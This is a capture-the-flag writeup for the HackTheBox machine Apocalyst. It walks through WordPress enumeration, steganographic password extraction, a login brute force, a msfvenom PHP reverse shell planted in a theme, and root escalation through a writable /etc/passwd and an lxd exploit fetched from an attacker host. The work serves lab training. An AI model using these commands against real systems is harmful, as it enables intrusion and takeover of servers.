Post

HackTheBox Apocalyst

Writeup for HackTheBox Apocalyst

Posted Updated
By Edwin Tok
11 min read
HackTheBox Apocalyst

Machine Synopsis

Apocalyst is a fairly straightforward machine, however it requires a wide range of tools and techniques to complete. It touches on many different topics and can be a great learning resource for many. (Source)

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13

❯ nmap -sC -sV 10.10.10.46

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
|   256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
|_  256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-title: Apocalypse Preparation Blog
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initially, the website seemed very basic as it could not load all of the elements from the domain apocalsyt.htb. Let’s add the domain to our /etc/hosts and try again.

1

echo -e '10.10.10.46\t\tapocalyst.htb' | sudo tee -a /etc/hosts

webpage

Since we know that the website is running on WordPress, we can run wpscan to find known vulnerabilities.

1
2
3
4
5
6
7
8

❯ wpscan --url http://10.10.10.46 -e --random-user-agent --api-token <token>
...
[i] User(s) Identified:

[+] falaraki
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
...

There were a lot of vulnerabilities shown but none seemed to be useful. The only possible useful information was the user falaraki.

Lets brute force the directories instead.

1
2
3
4
5
6
7

❯  ffuf -u http://apocalyst.htb/FUZZ/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e .php -fc 401,403,404
...
main            [Status: 200, Size: 157, Words: 14, Lines: 14, Duration: 4ms]
...
blog            [Status: 200, Size: 157, Words: 14, Lines: 14, Duration: 937ms]
...
wp-login.php    [Status: 200, Size: 2460, Words: 153, Lines: 70, Duration: 22ms]

It looks like there are a lot of 200 OK and it mostly redirects to this image except for /wp-login.php.

redirect_image

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<!doctype html>

<html lang="en">
<head>
  <meta charset="utf-8">

  <title>End of the world</title>
</head>

<body>
  <img src="image.jpg">
</body>
</html>

Apparently, we were supposed to generate a list of wordlist from the site. Lets use cewl to do so.

1
2
3
4
5
6
7
8
9
10
11
12

❯ cewl apocalyst.htb -w apocalyst.htb.wordlist --with-numbershead apocalyst.htb.wordlist
the
and
Apocalypse
Revelation
that
Preparation
Blog
end
2017
Book

Lets try to brute force the directories again with the generated wordlist and also filter for response size 157 because it seems to be gibberish.

1
2
3

❯ ffuf -u http://apocalyst.htb/FUZZ/ -w apocalyst.htb.wordlist -fs 157
...
Rightiousness           [Status: 200, Size: 175, Words: 18, Lines: 15, Duration: 4ms]

Accessing http://apocalyst.htb/Rightiousness/ seems to bring us to the same image as before but the source code was slightly different.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<!doctype html>

<html lang="en">
<head>
  <meta charset="utf-8">

  <title>End of the world</title>
</head>

<body>
  <img src="image.jpg">
  <!-- needle -->
</body>
</html>

This seems like a steganography challenge.

Exploitation

Lets download the image and analyze it.

1

❯ wget http://apocalyst.htb/Rightiousness/image.jpg

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

❯ exiftool image.jpg
ExifTool Version Number         : 13.00
File Name                       : image.jpg
Directory                       : .
File Size                       : 216 kB
File Modification Date/Time     : 2017:07:27 18:08:34+08:00
File Access Date/Time           : 2025:01:14 19:59:20+08:00
File Inode Change Date/Time     : 2025:01:14 19:59:20+08:00
File Permissions                : -rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1

Lets try to extract any hidden information in the image file using steghide.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

❯ steghide extract -sf image.jpg
Enter passphrase: <no password>
wrote extracted data to "list.txt".head list.txt
World
song
from
disambiguation
Wikipedia
album
page
this
world
Edit

There seems to be a list of words. Could this be the password list for the user falaraki?

1
2
3

❯ wpscan --url http://apocalyst.htb --passwords list.txt --usernames falaraki
...
[SUCCESS] - falaraki / Transclisiation

falaraki_login

After logging into WordPress as falaraki, we can activate the Twenty Seventeen Theme under Appearance.

Thereafter, we can generate a malicious msfvenom php payload and place it in the index.php of the Twenty Seventeen Theme we just activated.

1

❯ msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.13 lport=1337 -f raw > poc.php

twenty_seventeen_index

Finally, we can start a multi handler listener and execute the payload by visiting http://apocalyst.htb.

1
2
3
4
5
6
7
8
9
10
11

msf6 exploit(multi/handler) > run 
[*] Started reverse TCP handler on 10.10.14.13:1337 
[*] Sending stage (40004 bytes) to 10.10.10.46
[*] Meterpreter session 1 opened (10.10.14.13:1337 -> 10.10.10.46:53584) at 2025-01-14 20:19:44 +0800
meterpreter > shell
Process 3052 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@apocalyst:/var/www/html/apocalyst.htb$ www-data@apocalyst:/var/www/html/apocalyst.htb$ cd /home/falaraki
www-data@apocalyst:/home/falaraki$ cat user.txt
91d27152ab28ecd8255d6c67f25ed053

We could also enumerate the wp-config file for some interesting information.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

  www-data@apocalyst:/var/www/html$ cat /var/www/html/apocalyst.htb/wp-config.php
  ...
  // ** MySQL settings - You can get this info from your web host ** //
  /** The name of the database for WordPress */
  define('DB_NAME', 'wp_myblog');
  
  /** MySQL database username */
  define('DB_USER', 'root');
  
  /** MySQL database password */
  define('DB_PASSWORD', 'Th3SoopaD00paPa5S!');
  
  /** MySQL hostname */
  define('DB_HOST', 'localhost');
  ...

There is a hardcoded mysql credential. Lets try to use it and connect to the mysql service.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

  www-data@apocalyst:/var/www/html/apocalyst.htb$ mysql -uroot -p
  mysql -uroot -p
  Enter password: Th3SoopaD00paPa5S!
  
  Welcome to the MySQL monitor.  Commands end with ; or \g.
  Your MySQL connection id is 4849
  Server version: 5.7.19-0ubuntu0.16.04.1 (Ubuntu)
  
  Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
  
  Oracle is a registered trademark of Oracle Corporation and/or its
  affiliates. Other names may be trademarks of their respective
  owners.
  
  Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
  
  mysql> show databases;
  show databases;
  +--------------------+
  | Database           |
  +--------------------+
  | information_schema |
  | mysql              |
  | performance_schema |
  | sys                |
  | wp_myblog          |
  +--------------------+
  5 rows in set (0.00 sec)
  
  mysql> use wp_myblog;
  use wp_myblog;
  Reading table information for completion of table and column names
  You can turn off this feature to get a quicker startup with -A
  
  Database changed
  mysql> show tables;
  show tables;
  +-----------------------+
  | Tables_in_wp_myblog   |
  +-----------------------+
  | wp_commentmeta        |
  | wp_comments           |
  | wp_links              |
  | wp_options            |
  | wp_postmeta           |
  | wp_posts              |
  | wp_term_relationships |
  | wp_term_taxonomy      |
  | wp_termmeta           |
  | wp_terms              |
  | wp_usermeta           |
  | wp_users              |
  +-----------------------+
  12 rows in set (0.00 sec)
  
  mysql> select * from wp_users;
  select * from wp_users;
  +----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
  | ID | user_login | user_pass                          | user_nicename | user_email          | user_url | user_registered     | user_activation_key | user_status | display_name |
  +----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
  |  1 | falaraki   | $P$BnK/Jm451thx39mQg0AFXywQWZ.e6Z. | falaraki      | admin@apocalyst.htb |          | 2017-07-27 09:33:13 |                     |           0 | falaraki     |
  +----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+

It looks like we manage to find the hash for falaraki user. However, we couldn’t crack this hash with john or hashcat

Listing all the files on falaraki home directory shows an interesting .secret file that seems to contain some base64 encoding.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

www-data@apocalyst:/home/falaraki$ ls -la
ls -la
total 44
drwxr-xr-x 4 falaraki falaraki 4096 Jul 27  2017 .
drwxr-xr-x 3 root     root     4096 Jul 26  2017 ..
-rw------- 1 falaraki falaraki  516 Jul 27  2017 .bash_history
-rw-r--r-- 1 falaraki falaraki  220 Jul 26  2017 .bash_logout
-rw-r--r-- 1 falaraki falaraki 3771 Jul 26  2017 .bashrc
drwx------ 2 falaraki falaraki 4096 Jul 26  2017 .cache
drwxrwxr-x 2 falaraki falaraki 4096 Jul 26  2017 .nano
-rw-r--r-- 1 falaraki falaraki  655 Jul 26  2017 .profile
-rw-rw-r-- 1 falaraki falaraki  109 Jul 26  2017 .secret
-rw-r--r-- 1 falaraki falaraki    0 Jul 26  2017 .sudo_as_admin_successful
-rw-r--r-- 1 root     root     1024 Jul 27  2017 .wp-config.php.swp
-rw-rw-r-- 1 falaraki falaraki   33 Jan 14 06:59 user.txt
www-data@apocalyst:/home/falaraki$ cat .secret
cat .secret
S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=

Lets decode the .secret.

1
2
3
4

www-data@apocalyst:/home/falaraki$ cat .secret | base64 -d
cat .secret | base64 -d
Keep forgetting password so this will keep it safe!
Y0uAINtG37TiNgTH!sUzersP4ss

Now we can ssh into the host as falaraki.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

❯ ssh falaraki@10.10.10.46
The authenticity of host '10.10.10.46 (10.10.10.46)' can't be established.
ED25519 key fingerprint is SHA256:PVDveF1cC5VrDOAvRxNQhmBpPRjTLbRGDdGcdM3wkLM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.46' (ED25519) to the list of known hosts.
falaraki@10.10.10.46's password: Y0uAINtG37TiNgTH!sUzersP4ss
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

120 packages can be updated.
61 updates are security updates.


Last login: Thu Jul 27 12:09:11 2017 from 10.0.2.15

falaraki@apocalyst:~$

Privilege Escalation

Lets run sudo -l to check what privileges falaraki user has.

1
2
3

falaraki@apocalyst:~$ sudo -l
[sudo] password for falaraki: 
Sorry, user falaraki may not run sudo on apocalyst.

Lets use linpeas.sh to help us find interesting information instead.

1
2
3
4
5
6
7
8
9

falaraki@apocalyst:~$ cd /tmp
falaraki@apocalyst:/tmp$ wget http://10.10.14.13/linpeas.sh
falaraki@apocalyst:/tmp$ chmod +x linpeas.sh 
falaraki@apocalyst:/tmp$ ./linpeas.sh
...
uid=1000(falaraki) gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
...
═╣ Writable passwd file? ................ /etc/passwd is writable
...

It looks like there are 2 ways to get privesc!

Writable /etc/passwd

Lets compute the hash of passord using openssl passwd.

1
2

❯ openssl passwd password
$1$.1kY7r64$jjgp0NvAkDewQqY3xGmSp0

The format of /etc/passwd is [username]:[password hash]:[userid]:[groupid]:[comment]:[home dir]:[shell].

We can now add ourselves to the /etc/passwd as root.

1
2
3
4
5
6

falaraki@apocalyst:/tmp$ echo 'shiro:$1$.1kY7r64$jjgp0NvAkDewQqY3xGmSp0:0:0:shiro:/root:/bin/bash' >> /etc/passwd
falaraki@apocalyst:/tmp$ su shiro
Password: 
root@apocalyst:/tmp# 
root@apocalyst:/tmp# cat /root/root.txt
2ec738b9164708fc65c56cc5ca7f8eb0

LXD

Since we are in the lxd group, we can abuse the lxd privilege escalation exploit from this GitHub repo.

1
2

❯ wget https://raw.githubusercontent.com/0bfxgh0st/lxd-privesc-exploit/refs/heads/main/lxd-privesc-exploit.sh -O lxd-privesc-exploit.sh
❯ python3 -m http.server 80

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

falaraki@apocalyst:/tmp$ wget http://10.10.14.13/lxd-privesc-exploit.sh
falaraki@apocalyst:/tmp$ chmod +x lxd-privesc-exploit.sh 
falaraki@apocalyst:/tmp$ ./lxd-privesc-exploit.sh 
[+] Building lxd privesc exploit
error: This must be run as root
Image imported with fingerprint: 6660ba8332f9ae75637afe2e6713f1e257163aa6c7ae3c8e338392d117dcb7ba
Creating x0bfxgh0st
Device container added to x0bfxgh0st
~ # 
~ # ls -la /mnt
total 93
drwxr-xr-x   23 root     root          4096 Jul 26  2017 .
drwxr-xr-x   19 root     root          4096 Jan 14 13:14 ..
drwxr-xr-x    2 root     root          4096 Jul 26  2017 bin
drwxr-xr-x    4 root     root          1024 Jul 26  2017 boot
drwxr-xr-x   20 root     root          4300 Jan 14 06:58 dev
drwxr-xr-x   92 root     root          4096 Jul 27  2017 etc
drwxr-xr-x    3 root     root          4096 Jul 26  2017 home
lrwxrwxrwx    1 root     root            32 Jul 26  2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x   22 root     root          4096 Jul 26  2017 lib
drwxr-xr-x    2 root     root          4096 Jul 26  2017 lib64
drwx------    2 root     root         16384 Jul 26  2017 lost+found
drwxr-xr-x    3 root     root          4096 Jul 26  2017 media
drwxr-xr-x    2 root     root          4096 Feb 15  2017 mnt
drwxr-xr-x    2 root     root          4096 Feb 15  2017 opt
dr-xr-xr-x  217 root     root             0 Jan 14 06:58 proc
drwx------    4 root     root          4096 Jan 14 06:59 root
drwxr-xr-x   27 root     root           940 Jan 14 13:14 run
drwxr-xr-x    2 root     root         12288 Jul 26  2017 sbin
drwxr-xr-x    2 root     root          4096 Jan 14  2017 snap
drwxr-xr-x    2 root     root          4096 Feb 15  2017 srv
dr-xr-xr-x   13 root     root             0 Jan 14 06:58 sys
drwxrwxrwt   10 root     root          4096 Jan 14 13:17 tmp
drwxr-xr-x   10 root     root          4096 Jul 26  2017 usr
drwxr-xr-x   14 root     root          4096 Jul 26  2017 var
lrwxrwxrwx    1 root     root            29 Jul 26  2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
/mnt # cat root/root.txt 
2ec738b9164708fc65c56cc5ca7f8eb0
HackTheBox
linux
This post is licensed under CC BY 4.0 by the author.